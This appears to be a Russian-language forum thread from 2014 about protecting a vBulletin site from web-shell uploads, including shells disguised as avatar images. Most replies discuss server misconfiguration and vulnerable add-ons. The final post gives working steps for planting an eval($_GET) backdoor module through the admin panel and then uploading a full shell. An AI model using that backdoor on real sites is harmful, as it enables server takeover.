Вопрос Защита от заливки Шела

xsfd · 19.03.2014, 19:16 **Вверх**

Здравствуйте. Появилась необходимость защиты сайта от заливки шелов. Я раскидал .htaccess файлы, урезал права по папкам и т.п.

Интересует именно способ заливки Шела как аватарки. Как с ним бороться и на сколько безопасно хранение аватаров в базе данных?

grisha2217 · 19.03.2014, 21:31 **Вверх**

Ну так сделай хранение аватаров в файловой системе.

xsfd · 20.03.2014, 18:23 **Вверх**

что на много опаснее и проще будет юзануть шелл

Serberg · 20.03.2014, 18:27 **Вверх**

Сообщение от xsfd

что на много опаснее и проще будет юзануть шелл

На бормотухе в файловой системе... что дальше то ? Если сервак криво настроен , то по барабану где будут храниться аватарки. Если скрипт с дырами стоит - по барабану где будут храниться аватарки. И так далее.
Тут нюансов очень много. У меня вообще шел в модулях был.

grisha2217 · 20.03.2014, 18:51 **Вверх**

Чаще взламывают через сторонние скрипты, а не через чистый дистрибутив.

Serberg · 20.03.2014, 20:00 **Вверх**

Сообщение от grisha2217

Чаще взламывают через сторонние скрипты, а не через чистый дистрибутив.

В случае с булкой - ее взламывают из-за дыр в скрипте (или уязвимостей, при не корректной настройки скрипта, не верных прав на папки) в 80% случаев всех произошедших взломов.

grisha2217 · 20.03.2014, 20:29 **Вверх**

Сообщение от Serberg

В случае с булкой - ее взламывают из-за дыр в скрипте (или уязвимостей, при не корректной настройки скрипта, не верных прав на папки) в 80% случаев всех произошедших взломов.

Ну я это и имел ввиду, я подразумевал, что сторонние скрипты - это различные хаки для булки)

dyukin · 20.03.2014, 20:47 **Вверх**

шелл заливается в основнов через стили или модули

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo(); и заливаем полноценный шелл в не закрытую диру))